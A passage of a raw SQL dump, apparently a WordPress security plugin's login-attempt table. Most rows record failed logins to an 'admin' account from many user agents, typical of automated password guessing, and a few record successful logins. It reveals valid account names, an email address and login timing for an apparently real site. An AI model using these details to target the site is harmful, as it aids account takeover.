Firefox/52.0'),(1009,3344,1694627403.851004,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),(1010,3345,1694627414.346993,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'),(1011,3348,1694627429.518486,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0'),(1012,3354,1694628617.473981,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Y+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1013,3354,1694628617.484527,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Y+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1014,3357,1694629490.553662,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1015,3367,1694633600.243945,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Վf','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(1016,3368,1694633600.446588,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0o}r\r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'),(1017,3369,1694633603.791083,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(1018,3370,1694633609.792489,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0'),(1019,3371,1694633610.175883,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(1020,3372,1694633611.696759,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),(1021,3373,1694633615.134985,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0'),(1022,3374,1694633618.103839,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),(1023,3375,1694633619.714917,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(1024,3376,1694633623.427242,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(1025,3377,1694633630.064431,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0,h','Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0'),(1026,3378,1694633635.477058,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z|<','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'),(1027,3383,1694638000.883454,1,'loginFailInvalidUsername','BillStaples',0,'\0\0\0\0\0\0\0\0\0\0%d','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0'),(1028,3386,1694640088.965643,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(1029,3387,1694640089.256779,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\03O','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'),(1030,3388,1694640092.513166,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0-Ly','Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1031,3393,1694640120.691725,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Z','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0'),(1032,3395,1694640129.997900,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),(1033,3621,1694646589.393516,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1034,3622,1694646977.408426,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(1035,3624,1694646982.646532,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z|<','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/20.6.14'),(1036,3625,1694646987.038819,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0'),(1037,3627,1694646996.467852,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+9v','Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),(1038,3628,1694647001.972760,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(1039,3633,1694647011.137130,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1040,3635,1694647017.148610,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0'),(1041,3636,1694647020.683153,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),(1042,3638,1694647022.977577,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\n','Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0'),(1043,3662,1694649434.314107,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0{{','Mozilla/5.0 (X11; CrOS x86_64 14324.62.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.77 Safari/537.36'),(1044,3663,1694650111.243778,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Linux; Android 11; moto g pure) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(1045,3664,1694650508.810093,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gFJ','Mozilla/5.0 (Linux; Android 11; IN2017) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(1046,3672,1694655185.053330,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gf','Mozilla/5.0 (Linux; Android 12; Pixel 3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.50 Mobile Safari/537.36'),(1047,3673,1694655399.649916,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'),(1048,3674,1694655402.227914,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'),(1049,3675,1694655408.710538,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1050,3676,1694655409.234281,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(1051,3677,1694655411.735353,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[','Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1052,3678,1694655415.175376,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Linux; Android 10; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1053,3679,1694655421.611710,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+9v','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1054,3680,1694655429.766870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0e4','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),(1055,3681,1694655432.436965,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g`','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),(1056,3682,1694655436.655304,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),(1057,3683,1694655436.827636,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0`','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.131 Safari/537.36'),(1058,3684,1694655438.081123,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0'),(1059,3687,1694656829.088365,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1060,3692,1694657461.765533,1,'loginFailValidUsername','sara',2,' r@|\0!K','Mozilla/5.0 (Linux; Android 10; LM-K300) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(1061,3695,1694661170.046566,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[yQ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(1062,3698,1694661181.585472,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(1063,3701,1694661189.632641,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(1064,3703,1694661193.508010,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(1065,3705,1694661208.083802,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+9v','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(1066,3708,1694667153.580710,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'),(1067,3709,1694667153.874226,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1068,3710,1694667155.639345,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0&N','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(1069,3711,1694667157.024657,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(1070,3712,1694667159.562099,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0~M5','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'),(1071,3713,1694667163.537920,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+9v','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(1072,3715,1694667170.131360,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0'),(1073,3716,1694667178.637405,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(1074,3718,1694667187.119599,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0o}r\r','Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),(1075,3723,1694671877.952741,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0۰','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1076,3725,1694673466.047755,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(1077,3726,1694673471.727906,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+9v','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(1078,3727,1694673475.205471,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\03Q(','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(1079,3729,1694673478.613002,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g$','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1080,3731,1694673482.941701,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1081,3734,1694673489.272325,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(1082,3736,1694673500.389973,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0'),(1083,3737,1694673512.130753,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'),(1084,3738,1694673513.241673,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(1085,3740,1694679229.527723,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(1086,3742,1694679235.113993,1,'loginFailValidUsername','admin',1,'*x\0\0\0\0\0\0\0h\0)','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(1087,3744,1694679248.944391,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[yQ','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(1088,3745,1694679249.548083,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(1089,3746,1694679253.266079,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(1090,3753,1694682225.354627,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1091,3754,1694682226.902442,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1092,3756,1694682693.048535,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D4$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1093,3759,1694685124.193305,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 ','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0'),(1094,3761,1694685131.660174,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'),(1095,3762,1694685131.765015,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\03Q(','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(1096,3763,1694685133.489086,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),(1097,3764,1694685142.772632,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Վf','Mozilla/5.0 (Linux; Android 10; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1098,3765,1694685148.779965,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0,@','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),(1099,3767,1694685156.177913,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'),(1100,3768,1694685156.379369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\03Q(','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(1101,3781,1694689932.312063,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(1102,3783,1694689939.810519,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\','Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(1103,3784,1694689948.321456,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6'),(1104,3785,1694689949.407350,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(1105,3788,1694689958.775746,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(1106,3789,1694689976.609246,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),(1107,3798,1694694521.904260,0,'loginOK','Bibbi',3,'\0\0\0\0\0\0\0\0\0\0VcX','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(1108,3801,1694695944.013561,1,'loginFailInvalidUsername','geert',0,'*\0\0\0\0 \0 \0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'),(1109,3804,1694696852.186256,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%x','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1110,3811,1694700753.438809,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1111,3817,1694702268.939917,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1112,3817,1694702268.953777,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1113,3826,1694706023.033483,1,'loginFailInvalidUsername','info@tummyrevolution.com',0,'\0\0\0\0\0\0\0\0\0\0gA','Mozilla/5.0 (Linux; Android 12; SM-N981U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(1114,3828,1694706699.427943,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0rD','Mozilla/5.0 (Linux; Android 11; SM-N986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(1115,3832,1694707946.947913,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0dg ','Mozilla/5.0 (Linux; Android 12; SM-N986U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.92 Mobile Safari/537.36'),(1116,3834,1694709059.468929,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%x','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1117,3836,1694710391.618227,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1118,3844,1694715781.364751,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ch#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1119,3847,1694716616.719731,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1120,3892,1694721946.528212,1,'loginFailValidUsername','admin',1,' A.\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(1121,3935,1694724179.458264,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1122,3937,1694725638.627874,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Rfk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1123,3967,1694731346.942717,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0@*3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1124,3999,1694738792.991993,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%x','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1125,4006,1694740042.223737,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1126,4019,1694743268.423669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0FL#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1127,4020,1694743279.888826,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(1128,4029,1694745208.910782,1,'loginFailInvalidUsername','Mini 